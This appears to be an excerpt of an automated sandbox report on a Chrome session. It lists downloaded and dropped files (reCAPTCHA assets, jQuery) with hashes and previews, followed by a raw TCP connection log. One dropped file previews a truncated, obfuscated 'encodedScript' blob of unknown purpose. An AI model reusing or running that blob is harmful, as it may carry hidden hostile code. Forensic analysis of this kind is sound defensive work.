                                                                                                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):5909
                                                                                                                          Entropy (8bit):7.912523231606688
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:yENhVpO39YcubQpOpIXptLxf8743Ppw4nd+rf9X2XkOzr1WdWGKhhw8qwL:yuOy7Wprsopd+r1nOzpWdWHj
                                                                                                                          MD5:C41C7CC395BC5B233D797174E524AE4D
                                                                                                                          SHA1:51AF38BB24AC76E3F62F2D193D12CB5C6FA9C946
                                                                                                                          SHA-256:BD5160C1AEC031C3CECB9F309101068B751CEBE655D0E1BE4A044D235DEA5C0F
                                                                                                                          SHA-512:B1E964D57959A22E4A397F9BE5C1DED31570E4A4BFFAF9AD4506A3E887C7A1FE8BDEEC4F4C0273DE14F9F578CD2B57950FC11DCB323AACA7F5AAC52B68DEE4C0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.google.com/recaptcha/api2/payload?p=06AFcWeA7FMEkEn3AsWDGstm5iD-gQyEvUqp0J___l-WGFyY0VXkDveTeNkvyu6jh75ui6OGd0VXh6MwnUXut8I0Rgbf4I0qHOG5EnlD5L3GT_T6b7PsVKiYN3CqXDjyZJkAW3d-Q7IZ5oIAJrq3C1DHUCmtIDFSvEUp7I_zC6sOKjpcxK7WTsgZ6uaFatqn7MORfxornuDTxQ&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&id=61c71c20d51b4542
                                                                                                                          Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....~....A.0eI.T;.........^8.p..a/,..r`_.............9....{3s..:'.*..o9?x..0$..=F=.P..q.)..}.....x..P.I..`..j%.S......~vf.....~_....U.{....v).0.U...2N.A8.A....d.@..s)x.T.....OP..q.i.?..l'[+..4m.B.`.e..8...q..V.T.#..wD....)....8....../.......+EZ.]...{.../.<...1.JIO..~.+.g.....5k..)wx..P..C.8#qbN...z.*.]i...-k#\.<.%R[..`....t..Z..u..1....v..1..W+.@.'>.b..e.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (1434), with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):1434
                                                                                                                          Entropy (8bit):5.764806018887514
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2jkm94/zKPccAv+KVCe2TLph9gFB5vtADjkrDQndcl/1t4glvllLtsn13VYaaV40:VKEctKo7LmvtUjPKtX7On1FrLrwUnG
                                                                                                                          MD5:9562A43823586F6AC27BFD68008191C0
                                                                                                                          SHA1:7DE656D19EF76DA209801FB58CAF9A5768CB8E4E
                                                                                                                          SHA-256:F5E84A38832F846A7A36314906DDA59907313BEB04AD90E1A73A05BC4FF0B23B
                                                                                                                          SHA-512:7CF3115BD0081CA3B4416B23669833233CA2776941B7FFB825F2DEC6F79C6A1969075905514EE54400D6FB2C24C57A916D933B9DA54D671E9551FEAD83920C3B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.google.com/recaptcha/api.js
                                                                                                                          Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m)
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (618)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):559916
                                                                                                                          Entropy (8bit):5.709368907255143
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:j425DozjliD3fdArAw6OGT6HA9K1NQeWWX8nKAK+KZ8Wlm0vrqsy8t9758ud7R5:LD+jliD3FAcDYjL7Mn1KDZdIyOo17R5
                                                                                                                          MD5:94A89B84A37295C0E5B4940372E4881D
                                                                                                                          SHA1:C8F139EAFDF40B65B7B5FBBBA851C8049B66E1A5
                                                                                                                          SHA-256:4FF2DC0918273AD6922591D0D21A5FB0B1FEC77FBFCF844BAE9F783977550D09
                                                                                                                          SHA-512:12B3B825BA3D86B2D9FE9E62CB1B6ED4EFCC3A785D10A02342629F0194C5E4A4F25754A2D97C050C96D7CFF8CD25A6DEF3E3A35EB5C11197B9F05B35D544CA43
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.gstatic.com/recaptcha/releases/nhamhfA6n_hKMa_Y7UpFyA37/recaptcha__en.js
                                                                                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/.var X=function(){return[function(Y,h,K,I,P,O,E,H,m,M,p,L,v){if((Y&78)==((Y+2^17)<(v=["offsetHeight","prototype","apply"],Y)&&(Y-6|8)>=Y&&(L=R[45](1,h.id,h.name)),Y))for(m=[12,"fontSize",2],M=x[47](13,m[1],K),p=(E=M.match(KY))&&E[0]||h,M&&"px"==p?H=parseInt(M,10):(O=v7("SPAN",{style:"visibility:hidden;position:absolute;line-height:0;padding:0;margin:0;border:0;height:1em;"}),K.appendChild(O),M=O[v[0]],t[23](16,O),H=M),B[38](72,K,m[1],H+"px"),P=R[4](59,K).height;H>m[0]&&!(I<=0&&P<=m[2]*H)&&!(P<=I);)H-=.m[2],B[38](72,K,m[1],H+"px"),P=R[4](59,K).height;if((Y<<2&11)<8&&(Y^25)>=27)if(K.length<=h)L=String.fromCharCode[v[
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (5275), with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5459
                                                                                                                          Entropy (8bit):5.932879143714405
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:+kZOiYi+WDau8V6vxRgfqirQ5cjZW6KvY71k74k+1ZR4WJIhylnaalUDTQ9I1xEv:+cii+Wmu8V6vgfqirUuxKw71kRYZCWJh
                                                                                                                          MD5:A637AAF3FF21943CBA8915B5BEE39045
                                                                                                                          SHA1:999A2D2600EAE23F26BB9DA770F721E6640E4D53
                                                                                                                          SHA-256:D64624B393274B5DD43E0F00042715B36ED3B114098DDDACD71A40B9828FC12C
                                                                                                                          SHA-512:A528245DD9F2250E58F3ABC724B6408CA8CAB3A4E5153194364FD72D4FF7C356F89CDE0728299FEE824CE2FBC28CB84DB783B43AE2C4DBEEC740E75425E47DD8
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:var encodedScript = "cS0/WAIjGiVeGlNwPUF4WnlrPFcTdxYnUVsWFCMoNx48L2oLQXBUcToSWnBmPyoDeTBAFkF3U2oQRBsiZi41GzAnD1gCOBcvVBJHcDEiNh42PGRaDjQSPlldFH4uKisSdzg/VBIjASNeVVJhb3BSWnlrahZBPhVqGFcXMS8nHRQ6JC5TBX5TMToSWnBma3haeS4nVwg7Ny9TXR41ImtlWjg/JVRJMh4rWV4/PiUkPB89YnE8QXdTahASB1pma3haJGspVxU0G2oYV1NwPUF4WnlrahYCOB05X14ffiM5KhUrY21wAD4fL1QSDj9mLz0ZNi8vFgQ6EiNcCF18Zi5xQVNrahZBKnlqEDhacGZrd1V5DjJCEzYQPhBWFT0nIjZaMC1qRg4kACNSXh9aZmt4Wi8qOBYFOB4rWVxabWZsf0FTa2oWQT4VahhXFzEvJxwfOiQuUwV3VWwQVxcxLyccHzokLlMFeRokVFcCHyBjfzp+YmoIQXpCYxBJcHBma3haeS8lWwA+HWoNEh89JyI0PjwoJVIEM105QF4TJG5sGF1wEHtrWl1TahASB1pma1JaeWtqGU53JjlVEjk8IyoqGDA/aloOMBxqWVRaNCkmORM3ayNFQTYFK1leGzIqLlJaeWtqQAAlUyZfVRUDNCh4R3kvJVsAPh1qDxJYODI/KAljZGVaDjAcZFNeHzE0KTEOdyglW051U2EQVhU9JyI2WmNrbRFaXVNqOhJacGY9OQh5JitfDxQcJERTEz4jOXhHeS8lVRQ6FiREHB01Mg40HzQuJEIjLjouGBUXMS8lGxU3PytfDzIBbRkJcHBma3gXOCIkdQ45BytZXB8iaDgsAzUuZFIIJAMmUUtabWZsPhY8M20Na3dTahBfGzkoCDcULSojWAQlXTlESxY1aC00HyEPI0QENAcjX1xabWZsOxU1PidYRmx5ahASWj0nIjY5NiU+Vwg5FjgeQQ4pKi5
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):102
                                                                                                                          Entropy (8bit):4.7451269354882415
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:JSbMqSL1cdXWKQKYEPL68EDwVjWXjjWaee:PLKdXNQKpz16XXL
                                                                                                                          MD5:488438579243B46010EB659E6CBB1A68
                                                                                                                          SHA1:0AA55ED415DFAD5D0BDC11FE33801D3876B6477E
                                                                                                                          SHA-256:8B3EE5A1B4A03B50A573AEC1AD977DE017B6E7229662DF7C65BC5BDA207F0A52
                                                                                                                          SHA-512:2AE9510777571021A0E52C681425AF6F9819F29B1F0B72A3BE3AFA9ACD9168B8A90340496B4D86022E961AF56A87AD15C9FD209A1D26D5C7EC49E0F344E01A46
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:importScripts('https://www.gstatic.com/recaptcha/releases/nhamhfA6n_hKMa_Y7UpFyA37/recaptcha__en.js');
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):37393
                                                                                                                          Entropy (8bit):7.962374914838514
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:aZRyrwPI2S+3Gw22XYR53cZq3vkBSLBSw4qS9r3pELTJMh:agwS+3iVZadMLBSw4p9r3qL+h
                                                                                                                          MD5:024F815353B342324C63318E0240956D
                                                                                                                          SHA1:95A94E400533E1054D48B6534EAFC8159DCC2C42
                                                                                                                          SHA-256:FD5B83AF812E5699D67493DE548A4D0239E80C565873E6A17AAA13B0B80176D8
                                                                                                                          SHA-512:D0BC53E359DD2DE381037F4BA7BB638A3B9393F4AF66B8610E6A78AE8D2CBE93C8E3364D9F75DFB6FD9AFA344C9963511B8D6DAFF2C7BB3E3A7B480A3AD417CC
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.google.com/recaptcha/api2/payload?p=06AFcWeA6QB-xLWne_hEDWfQLtaaXIAmjra0Yu8cyWFqHWUIvK-sIL_JWaAR1nScLYHenHKcYJitr0hKm3HAXhFbXc_EKg4LBFbKroGCMf4Ru57BPA8nbWyamUlibCqmSl5FetcxEu7XgmTKmQ53DTV7WLK390J0d3liYPbUPlChD8XXJTZxLF0W65AgR-UzNdXgTinnpnX1gU&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE
                                                                                                                          Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................,.,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....z.E...Fo..](O..O..3.....V(.I..G.Ci0......P.....{w_...+.d.#....>b\L.....j.h]X..l.ur........t.^.>ar...B.....P.'..{..7N....T.w.......|%....Y..!m.6?.d..g...'..5y1.NN...!y......e...n..Z.K.....bMB^.?.....u...px...?..\..o...`..9..N..u.]....,V.{N..T...@...>.. ..+..;.{.C...1\.1u...<VZu..2<..Q&Q.`..0Fr8.~.....eg4..yR. .P...s.\..u.N.......1...Q..0.....=;....M<..~..8P
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):5696
                                                                                                                          Entropy (8bit):7.89883477567703
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:yEXbxlcbU3m4xp2/2TcKepHGjcKCihfcgeWvpvs2CXJHBn/AqgYkW1vSVe7ZN:ymVl53my2ok0c5+fcjWrwHNoqhvS2ZN
                                                                                                                          MD5:F4B351982B480F53DF105E2DF09C070B
                                                                                                                          SHA1:04FF83E548C0DD44D099F3F687AB8DC06E8B95FC
                                                                                                                          SHA-256:6D2BB998F220E3CFD3DCA23531DCCB8E2444AC6576E792C4D729F532BF733FD9
                                                                                                                          SHA-512:20C49A45E12C1B1DF350DA254E0D697F03AD57630A4FAF5285760B844723131E157B8D1C5FFA3772F2CA6686822A82E8AFCD2CCA68EF28FE60CDA77E59CE1879
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.google.com/recaptcha/api2/payload?p=06AFcWeA66jB7Squ_efAQ1wl69XvRCJnpngzp_HWY6p3QFWdpg9CSxF6n8e9Vd_f3cJlGjPL8O_bkiSrZ7aG8CyOoTTaO-BMrEv1mTwgfYMQg5KpsEHcwT5DN8II4CvzDez8m-ComcFHSSGm8wYXoICd6Wc3d4nwC2Jw1qKll4aNf78GGwJDKE66wVBQMV-eZZAlJBg24rXajW&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&id=23ea9996fd440bbf
                                                                                                                          Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................d.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....e...S*....g*@.....~.g.z.A.&..Je.....rG..^.~..xC..ZK.st.-....H.c..<t^.Lu5..!dXDw.m%.pA....8.3../i-..t).EFK..o..+f.S.f.._.c p.a..pO...8.%tIn.....PT.H''.. .....N.......)...,a.M.02A...O~...;.n<3....-.|JN>Px..R.c..=..V2.*....q.)k...........-.?kyL. ...|.;.^02N....USQ..k++M-Yf.....R2..F..W..\..b.K.;;..E\:F.VY.n.....H..k...ou=Q..t.....r.N......U))........7.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):89501
                                                                                                                          Entropy (8bit):5.289893677458563
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                          No static file info
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Dec 19, 2024 17:07:47.197221041 CET49673443192.168.2.16204.79.197.203
                                                                                                                          Dec 19, 2024 17:07:47.500781059 CET49673443192.168.2.16204.79.197.203
                                                                                                                          Dec 19, 2024 17:07:48.109818935 CET49673443192.168.2.16204.79.197.203
                                                                                                                          Dec 19, 2024 17:07:49.321770906 CET49673443192.168.2.16204.79.197.203
                                                                                                                          Dec 19, 2024 17:07:50.002279997 CET49710443192.168.2.1652.19.163.183
                                                                                                                          Dec 19, 2024 17:07:50.002331972 CET4434971052.19.163.183192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:50.002415895 CET49710443192.168.2.1652.19.163.183
                                                                                                                          Dec 19, 2024 17:07:50.002971888 CET49711443192.168.2.1652.19.163.183
                                                                                                                          Dec 19, 2024 17:07:50.003021955 CET4434971152.19.163.183192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:50.003089905 CET49711443192.168.2.1652.19.163.183
                                                                                                                          Dec 19, 2024 17:07:50.003266096 CET49710443192.168.2.1652.19.163.183
                                                                                                                          Dec 19, 2024 17:07:50.003283978 CET4434971052.19.163.183192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:50.003537893 CET49711443192.168.2.1652.19.163.183
                                                                                                                          Dec 19, 2024 17:07:50.003555059 CET4434971152.19.163.183192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:51.727797985 CET49673443192.168.2.16204.79.197.203
                                                                                                                          Dec 19, 2024 17:07:51.831134081 CET4969080192.168.2.16192.229.211.108
                                                                                                                          Dec 19, 2024 17:07:51.967890024 CET4434971052.19.163.183192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:51.968307972 CET49710443192.168.2.1652.19.163.183
                                                                                                                          Dec 19, 2024 17:07:51.968349934 CET4434971052.19.163.183192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:51.969808102 CET4434971052.19.163.183192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:51.969892025 CET49710443192.168.2.1652.19.163.183
                                                                                                                          Dec 19, 2024 17:07:51.971105099 CET49710443192.168.2.1652.19.163.183
                                                                                                                          Dec 19, 2024 17:07:51.971196890 CET4434971052.19.163.183192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:51.971348047 CET49710443192.168.2.1652.19.163.183
                                                                                                                          Dec 19, 2024 17:07:51.971364975 CET4434971052.19.163.183192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:51.974570990 CET4434971152.19.163.183192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:51.974812031 CET49711443192.168.2.1652.19.163.183
                                                                                                                          Dec 19, 2024 17:07:51.974841118 CET4434971152.19.163.183192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:51.976463079 CET4434971152.19.163.183192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:51.976527929 CET49711443192.168.2.1652.19.163.183
                                                                                                                          Dec 19, 2024 17:07:51.977471113 CET49711443192.168.2.1652.19.163.183
                                                                                                                          Dec 19, 2024 17:07:51.977556944 CET4434971152.19.163.183192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:52.014892101 CET49710443192.168.2.1652.19.163.183
                                                                                                                          Dec 19, 2024 17:07:52.030807018 CET49711443192.168.2.1652.19.163.183
                                                                                                                          Dec 19, 2024 17:07:52.030847073 CET4434971152.19.163.183192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:52.078819990 CET49711443192.168.2.1652.19.163.183
                                                                                                                          Dec 19, 2024 17:07:52.392522097 CET4434971052.19.163.183192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:52.392635107 CET4434971052.19.163.183192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:52.393224955 CET49710443192.168.2.1652.19.163.183
                                                                                                                          Dec 19, 2024 17:07:52.393301964 CET4434971052.19.163.183192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:52.393336058 CET49710443192.168.2.1652.19.163.183
                                                                                                                          Dec 19, 2024 17:07:52.396100998 CET49710443192.168.2.1652.19.163.183
                                                                                                                          Dec 19, 2024 17:07:53.444632053 CET49713443192.168.2.16142.250.181.132
                                                                                                                          Dec 19, 2024 17:07:53.444683075 CET44349713142.250.181.132192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:53.444794893 CET49713443192.168.2.16142.250.181.132
                                                                                                                          Dec 19, 2024 17:07:53.445045948 CET49713443192.168.2.16142.250.181.132
                                                                                                                          Dec 19, 2024 17:07:53.445064068 CET44349713142.250.181.132192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:55.004338026 CET49715443192.168.2.16151.106.103.155
                                                                                                                          Dec 19, 2024 17:07:55.004370928 CET44349715151.106.103.155192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:55.004434109 CET49715443192.168.2.16151.106.103.155
                                                                                                                          Dec 19, 2024 17:07:55.005242109 CET49715443192.168.2.16151.106.103.155
                                                                                                                          Dec 19, 2024 17:07:55.005256891 CET44349715151.106.103.155192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:55.159671068 CET44349713142.250.181.132192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:55.159962893 CET49713443192.168.2.16142.250.181.132
                                                                                                                          Dec 19, 2024 17:07:55.160002947 CET44349713142.250.181.132192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:55.161031961 CET44349713142.250.181.132192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:55.161109924 CET49713443192.168.2.16142.250.181.132
                                                                                                                          Dec 19, 2024 17:07:55.168482065 CET49713443192.168.2.16142.250.181.132
                                                                                                                          Dec 19, 2024 17:07:55.168562889 CET44349713142.250.181.132192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:55.210887909 CET49713443192.168.2.16142.250.181.132
                                                                                                                          Dec 19, 2024 17:07:55.210931063 CET44349713142.250.181.132192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:55.258775949 CET49713443192.168.2.16142.250.181.132
                                                                                                                          Dec 19, 2024 17:07:55.371166945 CET49678443192.168.2.1620.189.173.10
                                                                                                                          Dec 19, 2024 17:07:55.672825098 CET49678443192.168.2.1620.189.173.10
                                                                                                                          Dec 19, 2024 17:07:56.264062881 CET44349715151.106.103.155192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:56.264461994 CET49715443192.168.2.16151.106.103.155
                                                                                                                          Dec 19, 2024 17:07:56.264494896 CET44349715151.106.103.155192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:56.265930891 CET44349715151.106.103.155192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:56.266011000 CET49715443192.168.2.16151.106.103.155
                                                                                                                          Dec 19, 2024 17:07:56.267242908 CET49715443192.168.2.16151.106.103.155
                                                                                                                          Dec 19, 2024 17:07:56.267330885 CET44349715151.106.103.155192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:56.267407894 CET49715443192.168.2.16151.106.103.155
                                                                                                                          Dec 19, 2024 17:07:56.280807018 CET49678443192.168.2.1620.189.173.10
                                                                                                                          Dec 19, 2024 17:07:56.312779903 CET49715443192.168.2.16151.106.103.155
                                                                                                                          Dec 19, 2024 17:07:56.312808990 CET44349715151.106.103.155192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:56.360799074 CET49715443192.168.2.16151.106.103.155
                                                                                                                          Dec 19, 2024 17:07:56.536819935 CET49673443192.168.2.16204.79.197.203
                                                                                                                          Dec 19, 2024 17:07:56.839029074 CET44349715151.106.103.155192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:56.841203928 CET44349715151.106.103.155192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:56.841284037 CET49715443192.168.2.16151.106.103.155
                                                                                                                          Dec 19, 2024 17:07:56.841501951 CET49715443192.168.2.16151.106.103.155
                                                                                                                          Dec 19, 2024 17:07:56.841520071 CET44349715151.106.103.155192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:56.863785982 CET49717443192.168.2.16151.106.103.155
                                                                                                                          Dec 19, 2024 17:07:56.863832951 CET44349717151.106.103.155192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:56.863907099 CET49717443192.168.2.16151.106.103.155
                                                                                                                          Dec 19, 2024 17:07:56.864232063 CET49717443192.168.2.16151.106.103.155
                                                                                                                          Dec 19, 2024 17:07:56.864252090 CET44349717151.106.103.155192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:56.999661922 CET49718443192.168.2.16172.217.19.228
                                                                                                                          Dec 19, 2024 17:07:56.999712944 CET44349718172.217.19.228192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:56.999819994 CET49718443192.168.2.16172.217.19.228
                                                                                                                          Dec 19, 2024 17:07:57.000129938 CET49718443192.168.2.16172.217.19.228
                                                                                                                          Dec 19, 2024 17:07:57.000148058 CET44349718172.217.19.228192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:57.492794991 CET49678443192.168.2.1620.189.173.10
                                                                                                                          Dec 19, 2024 17:07:58.130163908 CET44349717151.106.103.155192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:58.130561113 CET49717443192.168.2.16151.106.103.155
                                                                                                                          Dec 19, 2024 17:07:58.130593061 CET44349717151.106.103.155192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:58.131716967 CET44349717151.106.103.155192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:58.132574081 CET49717443192.168.2.16151.106.103.155
                                                                                                                          Dec 19, 2024 17:07:58.132755041 CET44349717151.106.103.155192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:58.133064985 CET49717443192.168.2.16151.106.103.155
                                                                                                                          Dec 19, 2024 17:07:58.175332069 CET44349717151.106.103.155192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:58.602093935 CET44349717151.106.103.155192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:58.602425098 CET44349717151.106.103.155192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:58.602490902 CET49717443192.168.2.16151.106.103.155
                                                                                                                          Dec 19, 2024 17:07:58.602515936 CET44349717151.106.103.155192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:58.603082895 CET49717443192.168.2.16151.106.103.155
                                                                                                                          Dec 19, 2024 17:07:58.603367090 CET44349717151.106.103.155192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:58.603426933 CET49717443192.168.2.16151.106.103.155
                                                                                                                          Dec 19, 2024 17:07:58.717797041 CET44349718172.217.19.228192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:58.718061924 CET49718443192.168.2.16172.217.19.228
                                                                                                                          Dec 19, 2024 17:07:58.718095064 CET44349718172.217.19.228192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:58.720467091 CET44349718172.217.19.228192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:58.720541954 CET49718443192.168.2.16172.217.19.228
                                                                                                                          Dec 19, 2024 17:07:58.720911026 CET49718443192.168.2.16172.217.19.228
                                                                                                                          Dec 19, 2024 17:07:58.720998049 CET44349718172.217.19.228192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:58.722784042 CET49718443192.168.2.16172.217.19.228
                                                                                                                          Dec 19, 2024 17:07:58.745924950 CET49720443192.168.2.16151.106.103.155
                                                                                                                          Dec 19, 2024 17:07:58.745956898 CET44349720151.106.103.155192.168.2.16
                                                                                                                          Dec 19, 2024 17:07:58.746135950 CET49720443192.168.2.16151.106.103.155
                                                                                                                          Dec 19, 2024 17:07:58.746628046 CET49720443192.168.2.16151.106.103.155
